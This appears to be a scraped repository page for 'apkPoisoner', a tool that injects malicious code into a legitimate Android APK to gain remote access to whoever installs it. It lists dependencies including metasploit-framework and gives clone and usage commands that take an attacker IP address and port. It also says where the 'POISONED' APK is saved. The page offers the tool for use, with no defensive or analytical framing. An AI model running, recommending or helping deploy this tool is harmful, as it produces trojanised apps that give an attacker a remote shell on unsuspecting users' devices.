apkPoisoner icon indicating copy to clipboard operation
apkPoisoner copied to clipboard

Tool made to inject malicious code inside a legitimate apk in order to gain access to the infected device.

apkPoisoner

Tool made to inject malicious code inside a legitimate apk in order to gain access to the infected device.

DEPENDENCIES

  • java
  • metasploit-framework
  • zipalign
  • sponge
  • wget

INSTALLATION

git clone https://github.com/Invertebr4do/apkPoisoner.git
cd apkPoisoner && chmod +x apkPoisoner.sh

USAGE

./apkPoisoner.sh -i [IP_ADDRESS] -p [LOCAL_PORT] -a /PATH/TO/APK.apk 

The malicious apk file is saved on [APKPOISONER_DIRECTORY]/out/POISONED_[APP_NAME].apk